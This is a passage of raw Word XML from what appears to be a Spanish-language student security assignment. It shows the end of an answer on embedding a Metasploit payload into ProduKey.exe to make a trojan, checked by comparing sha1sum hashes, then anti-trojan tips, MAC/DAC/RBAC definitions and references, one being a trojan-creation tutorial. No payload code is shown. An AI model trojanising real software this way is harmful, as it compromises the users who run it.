          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="720"/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E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="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Ya al ejecutar el comando correctamente lo que se creara es un nuevo archivo con el mismo nombre, pero la diferencia es que este incluye el “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”. Para poderlos diferenciar lo que se debe hacer es ejecutar el comando  “</w:t>
      </w:r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# sha1sum /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/ProduKey.exe ProduKey.exe”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a cada uno de ellos.</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://www.reydes.com/d/?q=Crear_un_Troyano_utilizando_Metasploit_Framework", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Crear un Troyano utilizando Metasploit Framework | Alonso Caballero Quezada / ReYDeS", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=918d74b0-c0bf-3dee-a63d-a46561e90194" ] } ], "mendeley" : { "formattedCitation" : "[5]", "plainTextFormattedCitation" : "[5]", "previouslyFormattedCitation" : "[4]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00864591" w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="720"/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E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="720"/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E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="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b. Describa 3 formas de evitar que los usuarios sean víctimas de este tipo de ataques. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Descargar software legal o confiable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Tener activos los firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Activo todos los escudos del antivirus y estar actualizado correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2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864591" w:rsidRDefault="00864591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864591" w:rsidRDefault="00864591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864591" w:rsidRDefault="00864591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864591" w:rsidRDefault="00864591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864591" w:rsidRDefault="00864591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864591" w:rsidRDefault="00864591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864591" w:rsidRDefault="00864591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864591" w:rsidRDefault="00864591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FE07EC" w:rsidRDefault="00FE07EC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FE07EC" w:rsidRDefault="00FE07EC">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Defina con sus propias palabras:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>
        <w:tblW w:w="1041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19"/>
        <w:gridCol w:w="5085"/>
        <w:gridCol w:w="3412"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="100"/>
        </w:trPr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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="center"/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MODELO DE SEGURIDAD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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="center"/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DEFINICIÓN PROPIA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5B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="center"/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EJEMPLO/CASO DE USO REAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="100"/>
        </w:trPr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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val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MAC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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing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42729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">Es una política de acceso que no es determinada por el dueño de un recurso sino por el sistema. </w:t>
            </w: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5B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729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color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Se usa en sistemas multinivel que procesan información sensible como lo</w:t>
            </w:r>
            <w:r w:rsidR="00CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> es la información del gobierno. </w:t>
            </w:r>
            <w:r w:rsidR="00CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://www-2.dc.uba.ar/materias/seginf/material/Clase02-Unidad2_vf.pdf", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Unidad 2: Control de acceso", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=a14c1565-a75e-3b94-804b-e9a463469195" ] } ], "mendeley" : { "formattedCitation" : "[6]", "plainTextFormattedCitation" : "[6]", "previouslyFormattedCitation" : "[5]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
            </w:r>
            <w:r w:rsidR="00CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00864591" w:rsidRPr="00864591">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>[6]</w:t>
            </w:r>
            <w:r w:rsidR="00CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val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DAC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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="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 la política de acceso que es determinada por el dueño del recurso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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65B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:ind w:left="100"/>
              <w:contextualSpacing w:val="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Unix File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System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es un claro ejemplo de DAC</w:t>
            </w:r>
            <w:r w:rsidR="00CD7531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CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://www-2.dc.uba.ar/materias/seginf/material/Clase02-Unidad2_vf.pdf", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Unidad 2: Control de acceso", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=a14c1565-a75e-3b94-804b-e9a463469195" ] } ], "mendeley" : { "formattedCitation" : "[6]", "plainTextFormattedCitation" : "[6]", "previouslyFormattedCitation" : "[5]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
            </w:r>
            <w:r w:rsidR="00CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00864591" w:rsidRPr="00864591">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>[6]</w:t>
            </w:r>
            <w:r w:rsidR="00CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val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RBAC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765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="212121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color w:val="212121"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">En esta política de seguridad los roles son asignados por el </w:t>
            </w:r>
            <w:r w:rsidR="00CD7531">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="212121"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>sistema,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="212121"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> pero sin presentar cambios ya que se hacen estáticamente, de esta forma teniendo el control de acceso según el rol del usuario.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="212121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color w:val="212121"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Y este tipo control de acceso facilita la administración, ya que se adapta correctamente a una organización.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="242729"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc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5B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="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Las bases de datos de </w:t>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Oracle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</w:tbl>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Referencias en cada punto [OBLIGATORIO]: URL - LIBRO / Autor / Fecha Consulta / Páginas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/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675136" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>203200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6477000" cy="12700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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64591" w:rsidRPr="00864591" w:rsidRDefault="003F52F1" w:rsidP="00864591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve">ADDIN Mendeley Bibliography CSL_BIBLIOGRAPHY </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00864591" w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00864591" w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>N. FRANGAKIS, “e-democracy es.” .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864591" w:rsidRPr="00864591" w:rsidRDefault="00864591" w:rsidP="00864591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>D. Público, “SEGURIDAD EN INTERNET DE LAS COSAS Estado del arte.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864591" w:rsidRPr="00FE07EC" w:rsidRDefault="00864591" w:rsidP="00864591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE07EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE07EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>“wtmp.” [Online]. Available: https://www.ibiblio.org/pub/linux/docs/LuCaS/Manuales-LuCAS/SEGUNIX/unixsec-2.1-html/node90.html. [Accessed: 15-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864591" w:rsidRPr="00FE07EC" w:rsidRDefault="00864591" w:rsidP="00864591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">“Encuentra aquí información de Seguridad en bases de datos para tu escuela ¡Entra ya! </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE07EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>| Rincón del Vago.” [Online]. Available: https://html.rincondelvago.com/seguridad-en-bases-de-datos.html. [Accessed: 15-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864591" w:rsidRPr="00FE07EC" w:rsidRDefault="00864591" w:rsidP="00864591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">“Crear un Troyano utilizando Metasploit Framework | Alonso Caballero Quezada / ReYDeS.” </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE07EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[Online]. Available: http://www.reydes.com/d/?q=Crear_un_Troyano_utilizando_Metasploit_Framework. [Accessed: 15-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864591" w:rsidRPr="00FE07EC" w:rsidRDefault="00864591" w:rsidP="00864591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE07EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE07EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>“Unidad 2: Control de acceso.” [Online]. Available: http://www-2.dc.uba.ar/materias/seginf/material/Clase02-Unidad2_vf.pdf. [Accessed: 15-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRPr="00FE07EC" w:rsidRDefault="003F52F1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRPr="00FE07EC" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRPr="00FE07EC" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
